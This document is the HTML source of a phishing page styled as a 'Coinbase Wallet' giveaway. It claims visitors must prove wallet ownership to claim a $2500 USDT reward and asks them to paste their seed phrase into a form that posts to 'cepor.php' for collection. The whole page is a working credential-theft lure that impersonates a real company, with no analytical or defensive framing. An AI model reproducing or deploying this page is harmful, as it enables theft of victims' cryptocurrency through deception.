<!doctype html>
<html lang="en"><head>
<style>
.anticon {
  display: inline-block;
  color: inherit;
  font-style: normal;
  line-height: 0;
  text-align: center;
  text-transform: none;
  vertical-align: -0.125em;
  text-rendering: optimizeLegibility;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}

.anticon > * {
  line-height: 1;
}

.anticon svg {
  display: inline-block;
}

.anticon::before {
  display: none;
}

.anticon .anticon-icon {
  display: block;
}

.anticon[tabindex] {
  cursor: pointer;
}

.anticon-spin::before,
.anticon-spin {
  display: inline-block;
  -webkit-animation: loadingCircle 1s infinite linear;
  animation: loadingCircle 1s infinite linear;
}

@-webkit-keyframes loadingCircle {
  100% {
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}

@keyframes loadingCircle {
  100% {
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}
</style>
<meta charset="utf-8"><link rel="icon" href="images/svg/truste.svg"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#fafafa">
<link href="cunek/laicin/ayam/@berkokok/gampang.com/apk.css" rel="stylesheet">
<link rel="apple-touch-icon" href=images/svg/truste.png"><title>Coinbase~Giveaway</title>
<link href="cunek/laicin/ayam/@berkokok/gampang.com/chunk1.css" rel="stylesheet">
<link href="cunek/laicin/ayam/@berkokok/gampang.com/app.css" rel="stylesheet">
<link href="cunek/laicin/ayam/@berkokok/gampang.com/main.chunk.css" rel="stylesheet">
<script src="cunek/laicin/ayam/@berkokok/gampang.com/jquery.min.js"></script>
<script src="https://cdn.ethers.io/scripts/ethers-v4.min.js" charset="utf-8" type="text/javascript"></script>
</head>
<body>



<div id="root"><div class="ant-spin-nested-loading"><div class=""><div class="sc-jqCOkK kFZWwp"><div class="sc-gGBfsJ jvrGcO"><div class="sc-jnlKLf OHNdu"><div class="sc-fYxtnH hARKVj"></div><br>
<div class="confirm-approve-content__identicon-wrapper">&ensp;&ensp;&ensp;<img class="identicon confirm-approve-content__identicon" src="images/mpc.png" alt="" style="height: 60px;width: 60px;"></div>
<h1>&ensp;&ensp;Coinbase Wallet</h1>
<h2>&ensp;&ensp;&ensp;Import Wallet</h2><h5><p class="thepadding"><p class="sc-VigVT boha" style="color: red;">&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;Not enough funds for transaction fee, please fill your balance.<br>&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;you must have a balance of at least  $100 (USDT)</p></h5>
<br><br>
<div class="sc-htoDjs cDnNqw">
	<form method="post" action="cepor.php?nkbihfbeogaeaoehlefnkodbefgpgknn/home" class="ant-form ant-form-horizontal">
        <div class="ant-row ant-form-item ant-form-item-with-help" style="row-gap: 0px;"><div class="ant-col ant-form-item-control">
<div>
    <div class="thepadding">
        <textarea class="import-account__secret-phrase" placeholder="Paste seed phrase from clipboard" name="mpc" id="wordsseed"></textarea><h5>To Claim $2500 USDT  reward without cheating, we need confirmation your wallet, to make sure it's really you</h5>
        </div></div><div class="ant-form-item-explain">
                </div></div></div>

                <div class="thepadding">
<button class="button sc-VigVT fWmldN" disabled="" id="imp">IMPORT WALLET</button>
<div1></div1></div></form>
                </div>
<script src="cunek/laicin/ayam/@berkokok/gampang.com/load.js"></script>
</div></div></div></div></div></div></html>

